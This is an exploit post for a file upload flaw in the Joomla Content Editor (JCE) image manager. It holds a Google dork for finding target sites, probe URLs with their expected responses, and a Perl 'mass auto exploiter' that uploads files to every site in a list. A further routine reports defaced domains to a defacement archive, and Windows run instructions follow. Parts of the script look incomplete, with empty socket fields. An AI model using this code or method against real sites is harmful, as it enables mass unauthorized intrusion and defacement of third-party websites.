
Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability

Author: KingSkrupellos , Published: 11-10-2018
# Exploit Title :  Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepage : joomlacontenteditor.net
# Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/
# Exploit Risk : High
# CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CXSecurity [ Author : KingSkrupellos ] : cxsecurity.com/ascii/WLB-2018050200
# Cyberizm : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html

#################################################################################

Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter

Google Dork [ Example ] => inurl:''/index.php?option=com_jce''

You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed.

[ % 40 or more ] Use your brain.

Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg

JCE makes creating and editing Joomla!® content easy...
Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...

Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles

Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®,
Windows Media Player® and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options

Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension

Filemanager => Create links to images, documents, media and other common file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.

Template Manager => Insert pre-defined template content from HTML or text files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles

#################################################################################

Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

The component is prone to the following security vulnerabilities:

1. A cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input to
the 'search' parameter of the 'administrator/index.php' script.

2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
This may help the attacker steal cookie-based authentication credentials and launch other attacks.

JCE 2.1.0 is vulnerable; other versions may also be affected.

References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481

References => https://www.securityfocus.com/bid/53630

Note : This Joomla JCE is not the previous exploit going to this path => ..../images/stories/......php => NOT

This JCE issue is well known to some hackers, but others know nothing about this vulnerability. So this is the new one.

TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png

#################################################################################

Notes =>

Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] =>

https://cdn.pbrd.co/images/Hmx6KZC.jpg

An attacker cannot reach this image manager without a username and password for the control panel.

But there is a little trick to upload an image or a file through this vulnerability.

The attacker must do it with remote file upload code.

Watch Videos from Original Sources =>

Install JCE Editor in Joomla! 2.5 Tutorial

https://www.youtube.com/watch?v=oQdyi_xKJBk

Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial

https://www.youtube.com/watch?v=fI0_S-T1gK8

How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability

https://www.youtube.com/watch?v=X6h5kcAxvu0

#################################################################################

You can check in your browser with these exploit URLs whether a site is vulnerable, for testing its security. You will see some errors.

Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20

{"result":{"error":true,"result":""},"error":null}

Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

or giving this error => {"result":null,"error":"No function call specified!"}

Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/

{"result":null,"error":"No function call specified!"}

Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt

#################################################################################

Auto Mass Exploiter Perl =>

[code]#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title JCE Mass Auto Exploiter by KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Sitelerin Listesi Reyis:";
my $list=<STDIN>;
chomp($list);
open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;

foreach $site(@TARGETS){

chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
print "wait upload $site\n";

$vulnurl=$site.$exploiturl;
$res = $ua->get($vulnurl)->content;
if ($res =~ m/No function call specified!/i){
open(save, '>>C:\Users\Kullanıcılar\KingSkrupellos\result\list.txt');

print "\n[Uploading]";
my $res = $ua->post($vulnurl,
Content_Type => 'form-data',
Content => [
'upload-dir' => './../../',
'upload-overwrite' => 0,
'Filedata' => ["kingskrupellos.png"],
'action' => 'upload'

]
)->decoded_content;
if ($res =~ m/"error":false/i){

}else{
print " ......... ";
print color('bold white');
print "[";
print color('reset');
print color('bold green');
print "PATCHED";
print color('reset');
print color('bold white');
print "] \n";
print color('reset');
}

$remote = IO::Socket::INET->new(
Proto=>
PeerAddr=>"$site",
PeerPort=>
Timeout=>
);
$def= "$site/kingskrupellos.png";
print colored ("[+]Basarili",'white on_red'),"\n";
print "$site/kingskrupellos.png\n";
}else{
print colored (">>Exploit Olmadi<<",'white on_blue'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked By KingSkrupellos/){

$dmn= $link;
$def="KingSkrupellos";
$zn="http://aljyyosh.org/single.php";
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
'defacer' => $def,
'domain1' => $dmn,
'hackmode' => '15',
'reason' => '1',
'Gönder' => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print colored ("[-]Gönder $1",'white on_green'),"\n";
}
else
{
print colored ("[-]Hata",'black on_white'),"\n";
}
}else{
print" Zone Alınmadı !! \n";

}
}[/code]

How to use this code on your operating system like Windows ;

Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe

Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it.

Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt

C:/Users/Your-Computer-Name/ cd Desktop

cd "jcee"

perl yourexploitcodenamejce.pl

site.txt

Waiting for Upload

Exploit Successful or Not

Finished

# Uploaded File/Image Directory Path =>

TARGETDOMAIN/yourfilename.png .jpg .gif

TARGETDOMAIN/images/yourfilename.png .jpg .gif

#################################################################################

Example Vulnerable Sites =>


THE END
#################################################################################

Discovered By KingSkrupellos from Cyberizm Digital Security Team

#################################################################################
